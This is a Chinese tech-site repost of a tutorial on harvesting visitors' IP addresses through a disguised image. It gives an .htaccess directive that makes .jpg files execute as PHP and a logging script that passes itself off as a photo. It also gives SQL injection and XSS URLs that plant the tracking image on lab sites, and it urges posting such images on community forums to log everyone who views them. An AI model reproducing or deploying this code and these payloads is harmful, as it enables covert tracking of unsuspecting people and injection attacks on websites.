0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

如何通过一张照片来获取ip地址?

dyquk4xk2p3d 来源:良许Linux 作者:良许Linux 2022-12-14 10:31 次阅读

	

在本教程中,我们将学习如何用一张照片来盗取ip地址。我的想法是通过修改.htaccess文件,将jpg文件当作php文件来解析。

下面就是我们需要向.htaccess中添加的代码:

AddHandlerapplication/x-httpd-php5.jpg

然后将下面的代码复制到记事本中,命名为grabber.jpg


$fh=fopen('ip_list.txt','a');
fwrite($fh,$_SERVER['REMOTE_ADDR']."
");
fclose($fh);
$im=imagecreatefromjpeg("n00b.png");
header('Content-Type:image/jpeg');
imagejpeg($im);
imagedestroy($im);
?>

将grabber.jpg的权限设置为755,然后再找一张照片,将其命名为n00b.png,接着放到与grabber.jpg相同的目录之中。

就这样,一切工作就绪了。当别人浏览grabber.jpg这张照片的时候,他的ip地址就会被记录下来。

(译者注:需要把这些东西上传至我们的个人网站空间中)

POC:

(译者注:作者这里贴了一张可获取ip的演示照片,为了大家的隐私,我没有将其贴出,读者可自行去作者博客查看)

至此,我们的照片已经可以开始工作了。

接着我还想说明一下如何使用SQLi来获取ip地址。其实使用照片来盗取ip地址十分快捷,我们没有理由去使用SQLi这种方法,但是为了让读者获取到更多的知识,我还是说明一下吧:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'unionselect1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61622f696d61676569702f7472796d652e6a7067223e,3#

现在,再说一下如何使用xss来获取ip地址:

http://leettime.net/xsslab1/chalg1.php?name=<imgsrc="http://leettime.net/idiots_test_lab/imageip/tryme.jpg">&submit=Search

好了,就是这些了。

我们可以用这个技巧做许多有趣的事情,事实上大部分社区都允许我们发布一些照片,所以我们可以用这个方法去获取所有访问到我们照片的人的ip地址。

审核编辑 :李倩


声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • IP
    IP
    +关注

    关注

    5

    文章

    1404

    浏览量

    148296
  • 代码
    +关注

    关注

    30

    文章

    4555

    浏览量

    66772

原文标题:如何通过一张照片来获取ip地址?

文章出处:【微信号:良许Linux,微信公众号:良许Linux】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    CentOS虚拟机克隆后开机无法获取IP地址的解决策略

    克隆虚拟机后出现一台能获取IP地址,另外一台获取不到IP地址,查看MAC
    的头像 发表于 04-17 12:27 162次阅读
    CentOS虚拟机克隆后开机无法<b class='flag-5'>获取</b><b class='flag-5'>IP</b><b class='flag-5'>地址</b>的解决策略

    虚拟机的ip地址和主机一样吗

    虚拟机的ip地址和主机一样吗  虚拟机的IP地址和主机的IP地址通常不相同。虚拟机是在主机上
    的头像 发表于 03-26 15:34 399次阅读

    ip地址怎么判断a类b类c类

     A类IP地址的第一个字节范围在1到126之间,其默认网络掩码为255.0.0.0。例如,10.0.0.1就是一个A类IP地址
    的头像 发表于 02-19 10:16 1671次阅读

    获取Telegram的用户IP地址

    最近有个需求,查了些资料发现,Telegram有语音通话功能,也可以类似QQ一样通过语音通话的连接获取对方的IP地址, Denis Simonov (原文为俄语)发表过一篇文章,演示了
    的头像 发表于 01-12 11:35 648次阅读
    <b class='flag-5'>获取</b>Telegram的用户<b class='flag-5'>IP</b><b class='flag-5'>地址</b>

    什么是静态IP地址?什么是DHCP?DHCP与静态IP到底有何区别呢?

    什么是静态IP地址?什么是DHCP?DHCP与静态IP到底有何区别呢?DHCP与静态IP地址哪个好? 静态
    的头像 发表于 12-27 14:09 2162次阅读

    如何绑定ip地址与mac物理地址呢?

    如何绑定ip地址与mac物理地址呢? 绑定IP地址与MAC物理地址是一种网络管理和安全措施,可以
    的头像 发表于 12-07 09:33 1284次阅读

    开启了dhcp但获取不到ip

    DHCP(Dynamic Host Configuration Protocol),即动态主机配置协议,是一种用于自动分配IP地址和其他网络参数的协议。当我们在设置网络连接时开启DHCP,但无法获取
    的头像 发表于 11-27 14:47 2946次阅读

    局域网ip地址如何显示?如何通过软件来显示局域网ip地址

    局域网ip地址如何显示?前面我们提供了一种方法,是通过代码实现的,对于有一定网络基础的朋友来说,肯定是比较简单的,那有没有更简单的方法呢?
    发表于 10-12 14:59 335次阅读
    局域网<b class='flag-5'>ip</b><b class='flag-5'>地址</b>如何显示?如何<b class='flag-5'>通过</b>软件来显示局域网<b class='flag-5'>ip</b><b class='flag-5'>地址</b>?

    NAT网关有什么功能(局域网内多个IP设备通过同一个公共IP地址来访问Internet)

    网络地址转换(NAT)是一种能够将私有IP地址转换为公共IP地址以访问互联网的技术。其原因在于IPv4
    的头像 发表于 09-01 13:49 526次阅读

    什么是IP地址 IP子网划分VLSM详解

    网络掩码值为1的bit对应IP地址中的网络位;为0的bit对应IP地址中的主机位,以此来辅助我们识别一个IP
    发表于 08-10 10:00 1156次阅读
    什么是<b class='flag-5'>IP</b><b class='flag-5'>地址</b> <b class='flag-5'>IP</b>子网划分VLSM详解

    Kubernetes Pod如何获取IP地址呢?

    Kubernetes 网络模型的核心要求之一是每个 Pod 都拥有自己的 IP 地址并可以使用该 IP 地址进行通信。很多人刚开始使用 Kubernetes 时,还不清楚如何为每个 P
    的头像 发表于 07-21 10:00 539次阅读
    Kubernetes Pod如何<b class='flag-5'>获取</b><b class='flag-5'>IP</b><b class='flag-5'>地址</b>呢?

    一张照片证明你的职业 #电工知识 #电工#硬声创作季

    电工
    也许吧
    发布于 :2023年06月27日 11:06:38

    wlan没有找到有效的ip地址 wlan没有有效的ip配置怎么办

    路由器配置问题:路由器配置不正确可能会导致设备无法获取 IP 地址,这可能是因为您使用了错误的 IP 地址、子网掩码或默认网关。
    发表于 06-14 17:14 1.9w次阅读

    如何Reverse Engineer一张40年前的原理图...

    比如说下面这个图... 只有一张图片,没有原始的EDA文件: 唯的方法是重新绘制... 但通过合理的方法,可以让这个过程轻松点儿... 具体方式参见视频...
    发表于 05-22 19:47

    如何通过ESP8266获取公共IP

    我想知道,如果我可以通过 ESP8266 获取路由器的公共 IP? ESP8266 连接 --> 路由器 --> ESP 获取公共 IP
    发表于 05-15 08:51